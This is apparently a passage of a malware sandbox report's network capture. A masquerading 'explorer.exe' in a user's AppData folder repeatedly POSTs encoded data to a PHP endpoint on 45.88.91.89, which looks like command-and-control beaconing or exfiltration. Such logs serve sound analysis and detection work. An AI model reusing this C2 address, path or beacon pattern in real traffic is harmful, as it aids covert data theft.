Dec 13, 2024 14:33:37.432826042 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
Dec 13, 2024 14:33:37.782176971 CET | 2568 | OUT
Dec 13, 2024 14:33:38.575155020 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:38.809088945 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 49942 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:39.067308903 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:39.422705889 CET | 2568 | OUT
Dec 13, 2024 14:33:40.153320074 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:40.393306971 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 49945 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:40.632817030 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:40.985248089 CET | 2568 | OUT
Dec 13, 2024 14:33:41.723052025 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:41.957170010 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:41 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 49951 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:42.199922085 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:42.547827005 CET | 1456 | OUT
Dec 13, 2024 14:33:43.287892103 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:43.522574902 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 49952 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:42.207834959 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:42.563332081 CET | 2568 | OUT
Dec 13, 2024 14:33:43.293193102 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:43.526324034 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 49957 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:43.773684978 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
Dec 13, 2024 14:33:44.125982046 CET | 2568 | OUT
Dec 13, 2024 14:33:44.955610991 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:45.189002037 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 49962 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:45.429943085 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
Dec 13, 2024 14:33:45.782121897 CET | 2568 | OUT
Dec 13, 2024 14:33:46.515322924 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 13, 2024 14:33:46.749064922 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:46 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 49965 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 14:33:46.995266914 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:47.344631910 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:48.091969013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:48.313396931 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      55 | 192.168.2.6 | 49971 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:48.556397915 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:48.907146931 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:49.642421007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:49.881211996 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      56 | 192.168.2.6 | 49972 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:48.654072046 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:49.000854969 CET | 1456 | OUT
                                                      Dec 13, 2024 14:33:49.742472887 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:49.977381945 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      57 | 192.168.2.6 | 49977 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:50.119132042 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:50.469595909 CET | 2564 | OUT
                                                      Dec 13, 2024 14:33:51.208178997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:51.441313028 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:51 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      58 | 192.168.2.6 | 49979 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:51.679011106 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:52.032130003 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:52.814378977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:53.049446106 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      59 | 192.168.2.6 | 49985 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:53.319369078 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:53.672761917 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:54.406219006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:54.641321898 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      60 | 192.168.2.6 | 49990 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:54.884495974 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      61 | 192.168.2.6 | 49992 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:55.105959892 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:55.454009056 CET | 1456 | OUT
                                                      Dec 13, 2024 14:33:56.210119963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:56.445296049 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      62 | 192.168.2.6 | 49993 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:55.227169037 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:55.578948021 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:56.357489109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:56.589221001 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      63 | 192.168.2.6 | 49998 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:56.838886023 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:57.188438892 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:57.979693890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:58.215620995 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:57 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      64 | 192.168.2.6 | 50003 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:33:58.466857910 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:58.813446045 CET | 2568 | OUT
                                                      Dec 13, 2024 14:33:59.552851915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:59.785231113 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:59 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      65 | 192.168.2.6 | 50006 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:00.030910015 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:00.376034975 CET | 2568 | OUT
                                                      Dec 13, 2024 14:34:01.115986109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:01.349132061 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      66 | 192.168.2.6 | 50012 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:01.590090990 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:34:01.939287901 CET | 2568 | OUT
                                                      Dec 13, 2024 14:34:02.675849915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:02.909147024 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      67 | 192.168.2.6 | 50016 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:03.456089973 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:03.813497066 CET | 2568 | OUT | Data Raw: 56 5b 5d 58 53 5f 50 50 5b 5f 52 55 59 58 57 5d 57 5a 5f 53 50 52 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]XS_PP[_RUYXW]WZ_SPRV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-33>T?,[',3<($?&()[ '[$=%$8X/$[' \,"
                                                      Dec 13, 2024 14:34:04.612742901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:04.845293999 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      68 | 192.168.2.6 | 50021 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:34:05.087090969 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:34:05.438585997 CET | 2564 | OUT | Data Raw: 56 51 58 5f 56 5b 55 50 5b 5f 52 55 59 59 57 5d 57 5b 5f 5f 50 5c 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQX_V[UP[_RUYYW]W[__P\V[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.< &./S<7%<('8*$;X$+4+^%=>3 _/-$[' \,>
                                                      Dec 13, 2024 14:34:06.173295021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:34:06.405173063 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:34:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
